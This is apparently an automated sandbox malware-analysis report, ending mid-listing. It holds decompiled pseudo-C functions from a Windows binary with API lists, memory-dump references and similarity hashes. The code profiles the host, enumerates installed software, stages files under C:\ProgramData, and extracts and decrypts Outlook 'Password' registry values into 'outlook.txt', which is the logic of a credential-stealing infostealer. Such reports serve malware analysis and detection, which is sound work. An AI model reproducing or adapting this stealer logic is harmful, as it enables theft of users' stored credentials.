				CHAR* _t44;
				void* _t54;
				void* _t55;
				signed int _t56;
				void* _t57;

				_t55 = __esi;
				_t54 = __edi;
				_t42 = __ebx;
				_t29 =  *0x4301f4; // 0xe687535
				_v12 = _t29 ^ _t56;
				_t31 =  *0x4320dc; // 0x23375b0
				_t43 =  *0x43243c; // 0x2336b90
				_v8 = GetProcAddress(LoadLibraryA(_t43), _t31);
				if(_v8 != 0) {
					E004091C0( &_v348, 0, 0x40);
					_t57 = _t57 + 0xc;
					_v348 = 0x40;
					_t40 =  &_v348;
					GlobalMemoryStatusEx(_t40);
					if(_t40 != 1) {
						_v8 = 0;
					} else {
						_v280 = E0040E2D0(_v340, _v336, 0x100000, 0);
					}
				}
				if(_v8 == 0) {
					_v380.dwLength = 0;
					_v380.dwMemoryLoad = 0;
					_v380.dwTotalPhys = 0;
					_v380.dwAvailPhys = 0;
					_v380.dwTotalPageFile = 0;
					_v380.dwAvailPageFile = 0;
					_v380.dwTotalVirtual = 0;
					_v380.dwAvailVirtual = 0;
					_v380.dwLength = 0x20;
					GlobalMemoryStatus( &_v380);
					_v280 = _v380.dwTotalPhys >> 0x14;
				}
				_t44 =  *0x4321d4; // 0x23367f0
				wsprintfA( &_v276, _t44, _v280);
				return E00404354( &_v276, _t42, _v12 ^ _t56,  &_v276, _t54, _t55);
			}





















                                                                                                                              0x0041b340
                                                                                                                              0x0041b340
                                                                                                                              0x0041b340
                                                                                                                              0x0041b349
                                                                                                                              0x0041b350
                                                                                                                              0x0041b353
                                                                                                                              0x0041b359
                                                                                                                              0x0041b36d
                                                                                                                              0x0041b374
                                                                                                                              0x0041b381
                                                                                                                              0x0041b386
                                                                                                                              0x0041b389
                                                                                                                              0x0041b393
                                                                                                                              0x0041b39a
                                                                                                                              0x0041b3a0
                                                                                                                              0x0041b3c4
                                                                                                                              0x0041b3a2
                                                                                                                              0x0041b3bc
                                                                                                                              0x0041b3bc
                                                                                                                              0x0041b3a0
                                                                                                                              0x0041b3cf
                                                                                                                              0x0041b3d3
                                                                                                                              0x0041b3d9
                                                                                                                              0x0041b3df
                                                                                                                              0x0041b3e5
                                                                                                                              0x0041b3eb
                                                                                                                              0x0041b3f1
                                                                                                                              0x0041b3f7
                                                                                                                              0x0041b3fd
                                                                                                                              0x0041b403
                                                                                                                              0x0041b414
                                                                                                                              0x0041b423
                                                                                                                              0x0041b423
                                                                                                                              0x0041b430
                                                                                                                              0x0041b43e
                                                                                                                              0x0041b45a

                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(02336B90,023375B0), ref: 0041B360
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041B367
                                                                                                                              • _memset.LIBCMT ref: 0041B381
                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 0041B39A
                                                                                                                              • __aulldiv.LIBCMT ref: 0041B3B7
                                                                                                                              • GlobalMemoryStatus.KERNEL32 ref: 0041B414
                                                                                                                              • wsprintfA.USER32 ref: 0041B43E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: GlobalMemoryStatus$AddressLibraryLoadProc__aulldiv_memsetwsprintf
                                                                                                                              • String ID: $@
                                                                                                                              • API String ID: 2652395207-1077428164
                                                                                                                              • Opcode ID: 5d1e5206044d7470bcd509b6d8c798ef7ed0ea355bbd83c6af05cda44b111c2d
                                                                                                                              • Instruction ID: db4982e13e79d3db6745d5f0cfa83d5bf5defc0fd26a34047e2e0df123a5a917
                                                                                                                              • Opcode Fuzzy Hash: 5d1e5206044d7470bcd509b6d8c798ef7ed0ea355bbd83c6af05cda44b111c2d
                                                                                                                              • Instruction Fuzzy Hash: 2731E3B0D04218EFCB64DFA4DD49BDEB7B8AB48304F4045EAE60DA6280EB745A84CF54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041AC90, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 158registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 30%
                                                                                                                              			E0041AC90(void* __ebx, void* __edi, void* __esi) {
				int _v8;
				signed int _v12;
				char _v1036;
				char _v2060;
				void* _v2064;
				void* _v2068;
				int* _v2072;
				int _v2076;
				char _v3100;
				char _v203100;
				char* _v203104;
				int _v203108;
				intOrPtr* _v203112;
				intOrPtr _v203116;
				char _v203117;
				intOrPtr _v203124;
				signed int _t66;
				long _t71;
				char* _t73;
				long _t76;
				long _t80;
				long _t82;
				long _t89;
				void* _t98;
				void* _t128;
				void* _t129;
				signed int _t130;
				void* _t131;
				void* _t132;

				_t129 = __esi;
				_t128 = __edi;
				_t98 = __ebx;
				E00412A40(0x31970);
				_t66 =  *0x4301f4; // 0xe687535
				_v12 = _t66 ^ _t130;
				E004091C0( &_v203100, 0, 0x30d40);
				_t132 = _t131 + 0xc;
				_v2068 = 0;
				_v2064 = 0;
				_v203104 =  *0x43244c;
				_v2072 = 0;
				_v8 = 0xf003f;
				_v2076 = 0;
				_t117 =  &_v2068;
				_t71 = RegOpenKeyExA(0x80000002, _v203104, 0, 0x20019,  &_v2068); // executed
				if(_t71 == 0) {
					_v203108 = 0;
					while(_v2072 == 0) {
						_v2076 = 0x400;
						_t76 = RegEnumKeyExA(_v2068, _v203108,  &_v1036,  &_v2076, 0, 0, 0, 0); // executed
						_v2072 = _t76;
						if(_v2072 != 0) {
							L16:
							_v203108 = _v203108 + 1;
							continue;
						} else {
							 *0x432768( &_v2060, "%s\\%s", _v203104,  &_v1036);
							_t132 = _t132 + 0x10;
							_t80 = RegOpenKeyExA(0x80000002,  &_v2060, 0, 0x20019,  &_v2064); // executed
							if(_t80 == 0) {
								_v2076 = 0x400;
								_t82 = RegQueryValueExA(_v2064,  *0x432678, 0,  &_v8,  &_v3100,  &_v2076); // executed
								if(_t82 == 0) {
									_v203112 =  &_v3100;
									_v203116 = _v203112 + 1;
									do {
										_v203117 =  *_v203112;
										_v203112 = _v203112 + 1;
									} while (_v203117 != 0);
									_v203124 = _v203112 - _v203116;
									if(_v203124 > 1) {
										 *0x4328c4( &_v203100,  &_v3100);
										_v2076 = 0x400;
										_t89 = RegQueryValueExA(_v2064,  *0x432418, 0,  &_v8,  &_v3100,  &_v2076); // executed
										if(_t89 == 0) {
											 *0x4328c4( &_v203100, " ");
											 *0x4328c4( &_v203100,  &_v3100);
										}
										 *0x4328c4( &_v203100, "\n");
									}
								}
								 *0x432858(_v2064);
								goto L16;
							} else {
								_t117 = _v2064;
								 *0x432858(_v2064);
								 *0x432858(_v2068);
								_t73 =  &_v203100;
							}
						}
						goto L18;
					}
					_t117 = _v2068;
					 *0x432858(_v2068);
					_t73 =  &_v203100;
				} else {
					_t73 =  &_v203100;
				}
				L18:
				return E00404354(_t73, _t98, _v12 ^ _t130, _t117, _t128, _t129);
			}
































                                                                                                                              0x0041ac90
                                                                                                                              0x0041ac90
                                                                                                                              0x0041ac90
                                                                                                                              0x0041ac98
                                                                                                                              0x0041ac9d
                                                                                                                              0x0041aca4
                                                                                                                              0x0041acb5
                                                                                                                              0x0041acba
                                                                                                                              0x0041acbd
                                                                                                                              0x0041acc7
                                                                                                                              0x0041acd7
                                                                                                                              0x0041acdd
                                                                                                                              0x0041ace7
                                                                                                                              0x0041acee
                                                                                                                              0x0041acf8
                                                                                                                              0x0041ad12
                                                                                                                              0x0041ad1a
                                                                                                                              0x0041ad27
                                                                                                                              0x0041ad42
                                                                                                                              0x0041ad4f
                                                                                                                              0x0041ad7d
                                                                                                                              0x0041ad83
                                                                                                                              0x0041ad90
                                                                                                                              0x0041af23
                                                                                                                              0x0041ad3c
                                                                                                                              0x00000000
                                                                                                                              0x0041ad96
                                                                                                                              0x0041adb0
                                                                                                                              0x0041adb6
                                                                                                                              0x0041add3
                                                                                                                              0x0041addb
                                                                                                                              0x0041ae02
                                                                                                                              0x0041ae2e
                                                                                                                              0x0041ae36
                                                                                                                              0x0041ae42
                                                                                                                              0x0041ae51
                                                                                                                              0x0041ae57
                                                                                                                              0x0041ae5f
                                                                                                                              0x0041ae65
                                                                                                                              0x0041ae6c
                                                                                                                              0x0041ae81
                                                                                                                              0x0041ae8e
                                                                                                                              0x0041aea2
                                                                                                                              0x0041aea8
                                                                                                                              0x0041aed4
                                                                                                                              0x0041aedc
                                                                                                                              0x0041aeea
                                                                                                                              0x0041aefe
                                                                                                                              0x0041aefe
                                                                                                                              0x0041af10
                                                                                                                              0x0041af10
                                                                                                                              0x0041ae8e
                                                                                                                              0x0041af1d
                                                                                                                              0x00000000
                                                                                                                              0x0041addd
                                                                                                                              0x0041addd
                                                                                                                              0x0041ade4
                                                                                                                              0x0041adf1
                                                                                                                              0x0041adf7
                                                                                                                              0x0041adf7
                                                                                                                              0x0041addb
                                                                                                                              0x00000000
                                                                                                                              0x0041ad90
                                                                                                                              0x0041af28
                                                                                                                              0x0041af2f
                                                                                                                              0x0041af35
                                                                                                                              0x0041ad1c
                                                                                                                              0x0041ad1c
                                                                                                                              0x0041ad1c
                                                                                                                              0x0041af3b
                                                                                                                              0x0041af48

                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 0041ACB5
                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,00000000), ref: 0041AD12
                                                                                                                              • RegEnumKeyExA.KERNEL32(00000000,?,?,00000400,00000000,00000000,00000000,00000000), ref: 0041AD7D
                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?), ref: 0041ADD3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Open$Enum_memset
                                                                                                                              • String ID: %s\%s$?
                                                                                                                              • API String ID: 3573074813-4134130046
                                                                                                                              • Opcode ID: c28af84634dd7fe829f9369c149b5434bdfd4557512f268f8a92ba82151ecc8b
                                                                                                                              • Instruction ID: 3ed3947afa43b3b00520fc6f230ae1a40cab295c59359ce42977ca459933d7fa
                                                                                                                              • Opcode Fuzzy Hash: c28af84634dd7fe829f9369c149b5434bdfd4557512f268f8a92ba82151ecc8b
                                                                                                                              • Instruction Fuzzy Hash: 0B614CB590122C9BDB25DF50DD94BE9B7BDFF48304F0081EAE249A6240DB745AC9CFA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00424E20, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 50%
                                                                                                                              			E00424E20(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v276;
				char _v540;
				signed int _t17;
				intOrPtr _t26;
				void* _t32;
				signed int _t49;
				void* _t55;

				_t55 = __eflags;
				_t17 =  *0x4301f4; // 0xe687535
				_v8 = _t17 ^ _t49;
				E004091C0( &_v276, 0, 0x104);
				E0041A380( &_v276, 0x1a); // executed
				 *0x4328c4( &_v276, _a8);
				E004091C0( &_v540, 0, 0x104);
				 *0x4328c4( &_v540, "C:\\ProgramData\\300337377349991");
				_t26 =  *0x4320c4; // 0x2337e30
				 *0x4328c4( &_v540, _t26);
				 *0x4328c4(_a4);
				CreateDirectoryA( &_v540, 0); // executed
				_t32 = E00424D00(__ebx,  &_v276, __edi, __esi, _t55, 0x4294ed,  &_v276, _a12, _a8, _a4); // executed
				return E00404354(_t32, __ebx, _v8 ^ _t49,  &_v276, __edi, __esi,  &_v540);
			}











                                                                                                                              0x00424e20
                                                                                                                              0x00424e29
                                                                                                                              0x00424e30
                                                                                                                              0x00424e41
                                                                                                                              0x00424e52
                                                                                                                              0x00424e65
                                                                                                                              0x00424e79
                                                                                                                              0x00424e8d
                                                                                                                              0x00424e93
                                                                                                                              0x00424ea0
                                                                                                                              0x00424eb1
                                                                                                                              0x00424ec0
                                                                                                                              0x00424ede
                                                                                                                              0x00424ef3

                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 00424E41
                                                                                                                                • Part of subcall function 0041A380: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0041A39D
                                                                                                                              • lstrcat.KERNEL32(?,02337DB8), ref: 00424E65
                                                                                                                              • _memset.LIBCMT ref: 00424E79
                                                                                                                              • lstrcat.KERNEL32(?,C:\\ProgramData\\300337377349991), ref: 00424E8D
                                                                                                                              • lstrcat.KERNEL32(?,02337E30), ref: 00424EA0
                                                                                                                              • lstrcat.KERNEL32(?,02337DB8), ref: 00424EB1
                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 00424EC0
                                                                                                                                • Part of subcall function 00424D00: SetCurrentDirectoryA.KERNEL32(00424F3F), ref: 00424D17
                                                                                                                                • Part of subcall function 00424D00: __findfirst64i32.LIBCMT ref: 00424D26
                                                                                                                                • Part of subcall function 00424D00: _memset.LIBCMT ref: 00424D49
                                                                                                                                • Part of subcall function 00424D00: _memset.LIBCMT ref: 00424D5F
                                                                                                                                • Part of subcall function 00424D00: lstrcat.KERNEL32(?,00424F3F), ref: 00424D72
                                                                                                                                • Part of subcall function 00424D00: lstrcat.KERNEL32(?,passwords.txt), ref: 00424D84
                                                                                                                                • Part of subcall function 00424D00: lstrcat.KERNEL32(?,C:\\ProgramData\\300337377349991), ref: 00424D96
                                                                                                                                • Part of subcall function 00424D00: lstrcat.KERNEL32(?,02337E30), ref: 00424DAA
                                                                                                                                • Part of subcall function 00424D00: lstrcat.KERNEL32(?,00424EE3), ref: 00424DBB
                                                                                                                                • Part of subcall function 00424D00: lstrcat.KERNEL32(?,passwords.txt), ref: 00424DCD
                                                                                                                                • Part of subcall function 00424D00: CopyFileA.KERNEL32(?,?,00000001), ref: 00424DE3
                                                                                                                                • Part of subcall function 00424D00: __findnext64i32.LIBCMT ref: 00424DF2
                                                                                                                              Strings
                                                                                                                              • C:\\ProgramData\\300337377349991, xrefs: 00424E81
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcat$_memset$Directory$CopyCreateCurrentFileFolderPath__findfirst64i32__findnext64i32
                                                                                                                              • String ID: C:\\ProgramData\\300337377349991
                                                                                                                              • API String ID: 1500432195-1113949659
                                                                                                                              • Opcode ID: f4b3a7596f8fdaf2e76ed6f01339550422c745ecdc72c7ec85b9adf5198f2bbc
                                                                                                                              • Instruction ID: ea5f56cdc59ae128c86347322f49a49318d30f91748238401bf9afd0c7f447a2
                                                                                                                              • Opcode Fuzzy Hash: f4b3a7596f8fdaf2e76ed6f01339550422c745ecdc72c7ec85b9adf5198f2bbc
                                                                                                                              • Instruction Fuzzy Hash: E121EBB2A4011CABCB18EF90DD86FDA7378AB5C304F044699B705571C1DB749A84CFA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041C810, Relevance: 13.6, APIs: 9, Instructions: 61libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E0041C810() {
				CHAR* _t1;
				struct HINSTANCE__* _t2;
				CHAR* _t5;
				struct HINSTANCE__* _t7;
				CHAR* _t10;
				struct HINSTANCE__* _t12;
				CHAR* _t15;
				CHAR* _t18;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HINSTANCE__* _t21;
				CHAR* _t22;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t24;
				CHAR* _t25;
				struct HINSTANCE__* _t26;
				CHAR* _t27;
				struct HINSTANCE__* _t28;

				_t1 =  *0x432568; // 0x2331438
				_t2 = LoadLibraryA(_t1); // executed
				 *0x43274c = _t2;
				if( *0x43274c == 0) {
					return 0;
				}
				_t18 =  *0x43247c; // 0x2335930
				_t24 =  *0x43274c; // 0x60900000
				 *0x432750 = GetProcAddress(_t24, _t18);
				_t5 =  *0x432140; // 0x2335f50
				_t19 =  *0x43274c; // 0x60900000
				 *0x432700 = GetProcAddress(_t19, _t5);
				_t25 =  *0x432408; // 0x2335858
				_t7 =  *0x43274c; // 0x60900000
				 *0x432720 = GetProcAddress(_t7, _t25);
				_t20 =  *0x4323f0; // 0x2336070
				_t26 =  *0x43274c; // 0x60900000
				 *0x43273c = GetProcAddress(_t26, _t20);
				_t10 =  *0x43241c; // 0x2335ed0
				_t21 =  *0x43274c; // 0x60900000
				 *0x432724 = GetProcAddress(_t21, _t10);
				_t27 =  *0x4325f4; // 0x23359c0
				_t12 =  *0x43274c; // 0x60900000
				 *0x432754 = GetProcAddress(_t12, _t27);
				_t22 =  *0x43250c; // 0x2335e90
				_t28 =  *0x43274c; // 0x60900000
				 *0x43272c = GetProcAddress(_t28, _t22);
				_t15 =  *0x432650; // 0x23361d0
				_t23 =  *0x43274c; // 0x60900000
				 *0x432734 = GetProcAddress(_t23, _t15);
				return 1;
			}





















                                                                                                                              0x0041c813
                                                                                                                              0x0041c819
                                                                                                                              0x0041c81f
                                                                                                                              0x0041c82b
                                                                                                                              0x00000000
                                                                                                                              0x0041c8fb
                                                                                                                              0x0041c831
                                                                                                                              0x0041c838
                                                                                                                              0x0041c845
                                                                                                                              0x0041c84a
                                                                                                                              0x0041c850
                                                                                                                              0x0041c85d
                                                                                                                              0x0041c862
                                                                                                                              0x0041c869
                                                                                                                              0x0041c875
                                                                                                                              0x0041c87a
                                                                                                                              0x0041c881
                                                                                                                              0x0041c88e
                                                                                                                              0x0041c893
                                                                                                                              0x0041c899
                                                                                                                              0x0041c8a6
                                                                                                                              0x0041c8ab
                                                                                                                              0x0041c8b2
                                                                                                                              0x0041c8be
                                                                                                                              0x0041c8c3
                                                                                                                              0x0041c8ca
                                                                                                                              0x0041c8d7
                                                                                                                              0x0041c8dc
                                                                                                                              0x0041c8e2
                                                                                                                              0x0041c8ef
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(02331438), ref: 0041C819
                                                                                                                              • GetProcAddress.KERNEL32(60900000,02335930), ref: 0041C83F
                                                                                                                              • GetProcAddress.KERNEL32(60900000,02335F50), ref: 0041C857
                                                                                                                              • GetProcAddress.KERNEL32(60900000,02335858), ref: 0041C86F
                                                                                                                              • GetProcAddress.KERNEL32(60900000,02336070), ref: 0041C888
                                                                                                                              • GetProcAddress.KERNEL32(60900000,02335ED0), ref: 0041C8A0
                                                                                                                              • GetProcAddress.KERNEL32(60900000,023359C0), ref: 0041C8B8
                                                                                                                              • GetProcAddress.KERNEL32(60900000,02335E90), ref: 0041C8D1
                                                                                                                              • GetProcAddress.KERNEL32(60900000,023361D0), ref: 0041C8E9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2238633743-0
                                                                                                                              • Opcode ID: 63c73c981d721ed519f396d62da7981b54ec637de26aff86e6c897e05b8272c8
                                                                                                                              • Instruction ID: 1d58dfb68342f40b28b35fc8f55cf59418151b06a09c04e22a3330fc5e42e00c
                                                                                                                              • Opcode Fuzzy Hash: 63c73c981d721ed519f396d62da7981b54ec637de26aff86e6c897e05b8272c8
                                                                                                                              • Instruction Fuzzy Hash: 7221FDB5614600AFC748EFA9FE9891677E9F74C301710E63AA609C3270D7B5A841CF6C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041EF60, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 175registrymemoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 90%
                                                                                                                              			E0041EF60(void* __ebx, long* __ecx, void* __edi, void* __esi, intOrPtr _a4, void* _a8, char* _a12) {
				long _v8;
				char _v16;
				void* _v20;
				char _v36;
				signed int _v40;
				char _v1064;
				int _v1068;
				char _v2096;
				int _v2100;
				char _v3128;
				int _v3132;
				int _v3136;
				char _v3144;
				int _v3148;
				char _v3176;
				char _v3204;
				char _v3208;
				signed int _v3212;
				long* _v3216;
				signed int _t78;
				signed int _t79;
				long _t83;
				intOrPtr _t87;
				void* _t106;
				void* _t118;
				void* _t160;
				void* _t161;
				signed int _t162;
				void* _t163;
				void* _t164;
				void* _t165;

				_t161 = __esi;
				_t160 = __edi;
				_t118 = __ebx;
				_push(0xffffffff);
				_push(E0042662F);
				_push( *[fs:0x0]);
				_t164 = _t163 - 0xc80;
				_t78 =  *0x4301f4; // 0xe687535
				_t79 = _t78 ^ _t162;
				_v40 = _t79;
				_push(_t79);
				 *[fs:0x0] =  &_v16;
				_v3216 = __ecx;
				_v3212 = 0;
				E00402DD0( &_v36);
				_v8 = 0;
				 *_v3216 = 0;
				_v20 = 0;
				_t149 = _a12;
				_t83 = RegOpenKeyExA(0x80000001, _a12, 0, 0x20019,  &_a8); // executed
				if(_t83 != 0) {
					E00402E00(_a4,  &_v36);
					_v3212 = _v3212 | 0x00000001;
					_v8 = 0xffffffff;
					E00402E80( &_v36);
					_t87 = _a4;
					goto L15;
				} else {
					_v3136 = 0;
					_v3132 = 0xff;
					_v1068 = 3;
					_v2096 = 0;
					while(RegEnumValueA(_a8, _v3136,  &_v2096,  &_v3132, 0,  &_v1068,  &_v1064,  &_v2100) == 0) {
						E00402D70( &_v3208);
						_v8 = 1;
						E00401EA0( &_v3204,  &_v2096);
						_v3208 = _v1068;
						_v3148 = _v2100;
						if(_v1068 != 3) {
							if(_v1068 != 1) {
								if(_v1068 == 4) {
									_v3144 = _v1064;
								}
							} else {
								E00401EA0( &_v3176,  &_v1064);
							}
						} else {
							_t106 = E00402D10( &_v2096, "Password");
							_t165 = _t164 + 8;
							if(_t106 == 0) {
								E004038E0( &_v1064,  &_v1064, "%S",  &_v1064);
								_t164 = _t165 + 0xc;
								E00401EA0( &_v3176,  &_v1064);
							} else {
								_v20 = E0041EED0( &_v1064, _v2100);
								E004038C0( &_v3128, _v20);
								HeapFree(GetProcessHeap(), 0, _v20);
								E00401EA0( &_v3176,  &_v3128);
								E004038C0( &_v3128, 0x429491);
								_t164 = _t165 + 0x18;
							}
						}
						 *_v3216 =  *_v3216 + 1;
						E00402EC0( &_v36,  &_v3208);
						_v3132 = 0x400;
						_v2100 = 0x400;
						_v3136 = _v3136 + 1;
						_v8 = 0;
						E00402DA0( &_v3208);
					}
					E00402E00(_a4,  &_v36);
					_t149 = _v3212 | 0x00000001;
					_v3212 = _v3212 | 0x00000001;
					_v8 = 0xffffffff;
					E00402E80( &_v36);
					_t87 = _a4;
					L15:
					 *[fs:0x0] = _v16;
					return E00404354(_t87, _t118, _v40 ^ _t162, _t149, _t160, _t161);
				}
			}


































                                                                                                                              0x0041ef60
                                                                                                                              0x0041ef60
                                                                                                                              0x0041ef60
                                                                                                                              0x0041ef63
                                                                                                                              0x0041ef65
                                                                                                                              0x0041ef70
                                                                                                                              0x0041ef71
                                                                                                                              0x0041ef77
                                                                                                                              0x0041ef7c
                                                                                                                              0x0041ef7e
                                                                                                                              0x0041ef81
                                                                                                                              0x0041ef85
                                                                                                                              0x0041ef8b
                                                                                                                              0x0041ef91
                                                                                                                              0x0041ef9e
                                                                                                                              0x0041efa3
                                                                                                                              0x0041efb0
                                                                                                                              0x0041efb6
                                                                                                                              0x0041efc8
                                                                                                                              0x0041efd1
                                                                                                                              0x0041efd9
                                                                                                                              0x0041f1f7
                                                                                                                              0x0041f205
                                                                                                                              0x0041f20b
                                                                                                                              0x0041f215
                                                                                                                              0x0041f21a
                                                                                                                              0x00000000
                                                                                                                              0x0041efdf
                                                                                                                              0x0041efdf
                                                                                                                              0x0041efe9
                                                                                                                              0x0041eff3
                                                                                                                              0x0041effd
                                                                                                                              0x0041f004
                                                                                                                              0x0041f048
                                                                                                                              0x0041f04d
                                                                                                                              0x0041f05e
                                                                                                                              0x0041f069
                                                                                                                              0x0041f075
                                                                                                                              0x0041f082
                                                                                                                              0x0041f13d
                                                                                                                              0x0041f15a
                                                                                                                              0x0041f162
                                                                                                                              0x0041f162
                                                                                                                              0x0041f13f
                                                                                                                              0x0041f14c
                                                                                                                              0x0041f14c
                                                                                                                              0x0041f088
                                                                                                                              0x0041f094
                                                                                                                              0x0041f099
                                                                                                                              0x0041f09e
                                                                                                                              0x0041f11a
                                                                                                                              0x0041f11f
                                                                                                                              0x0041f12f
                                                                                                                              0x0041f0a0
                                                                                                                              0x0041f0b6
                                                                                                                              0x0041f0c4
                                                                                                                              0x0041f0d9
                                                                                                                              0x0041f0ec
                                                                                                                              0x0041f0fd
                                                                                                                              0x0041f102
                                                                                                                              0x0041f102
                                                                                                                              0x0041f134
                                                                                                                              0x0041f179
                                                                                                                              0x0041f185
                                                                                                                              0x0041f18a
                                                                                                                              0x0041f194
                                                                                                                              0x0041f1a7
                                                                                                                              0x0041f1ad
                                                                                                                              0x0041f1b7
                                                                                                                              0x0041f1b7
                                                                                                                              0x0041f1c8
                                                                                                                              0x0041f1d3
                                                                                                                              0x0041f1d6
                                                                                                                              0x0041f1dc
                                                                                                                              0x0041f1e6
                                                                                                                              0x0041f1eb
                                                                                                                              0x0041f21d
                                                                                                                              0x0041f220
                                                                                                                              0x0041f235
                                                                                                                              0x0041f235

                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 0041EFD1
                                                                                                                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 0041F034
                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041F0D2
                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0041F0D9
                                                                                                                                • Part of subcall function 004038E0: _vswprintf_s.LIBCMT ref: 004038FB
                                                                                                                              • task.LIBCPMTD ref: 0041F1E6
                                                                                                                              • task.LIBCPMTD ref: 0041F215
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Heaptask$EnumFreeOpenProcessValue_vswprintf_s
                                                                                                                              • String ID: Password
                                                                                                                              • API String ID: 541219633-3434357891
                                                                                                                              • Opcode ID: 457a01965bc8a16e7e646d1f490dd91e8be1590f6004a9f66447c92fd646dc42
                                                                                                                              • Instruction ID: 7ef44c43e58b29f017847e03fa3b9e536e5a51fabef7b537324a8127fa539a65
                                                                                                                              • Opcode Fuzzy Hash: 457a01965bc8a16e7e646d1f490dd91e8be1590f6004a9f66447c92fd646dc42
                                                                                                                              • Instruction Fuzzy Hash: E9712BB19102189BDB24DF54CD91FDEB7B4BB48314F5082AAE50967281DF786F88CF98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041F240, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 67%
                                                                                                                              			E0041F240(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				char _v32;
				intOrPtr _v36;
				void* __ebp;
				intOrPtr _t26;
				void* _t61;
				void* _t62;

				_t60 = __esi;
				_t59 = __edi;
				_t42 = __ebx;
				E0041EF60(__ebx,  &_v32, __edi, __esi,  &_v28, 0x80000001, _a4); // executed
				_t26 = E004055AB("outlook.txt", "a+"); // executed
				_t62 = _t61 + 8;
				_v12 = _t26;
				_v8 = _v32;
				_t65 = _v8;
				if(_v8 > 0) {
					_push("\n");
					_push(_v12);
					E004055C2(__ebx, __edi, __esi, _t65);
					_t62 = _t62 + 8;
					_v36 = 0;
					while(1) {
						_t66 = _v36 - _v8;
						if(_v36 >= _v8) {
							goto L7;
						}
						_push(E00401330(E00402EA0( &_v28, _v36) + 4));
						_push("%s: ");
						_push(_v12);
						E004055C2(_t42, _t59, _t60, _t66);
						_t62 = _t62 + 0xc;
						if( *((intOrPtr*)(E00402EA0( &_v28, _v36))) != 4) {
							_push(E00401330(E00402EA0( &_v28, _v36) + 0x20));
							_push("%s\n");
							_push(_v12);
							E004055C2(_t42, _t59, _t60, E00402EA0( &_v28, _v36) + 0x20);
							_t62 = _t62 + 0xc;
						}
						_v36 = _v36 + 1;
					}
				}
				L7:
				_push(_v12);
				E00405EA3(_t42, _v12, _t59, _t60, __eflags);
				return E00402E80( &_v28);
			}












                                                                                                                              0x0041f240
                                                                                                                              0x0041f240
                                                                                                                              0x0041f240
                                                                                                                              0x0041f256
                                                                                                                              0x0041f265
                                                                                                                              0x0041f26a
                                                                                                                              0x0041f26d
                                                                                                                              0x0041f273
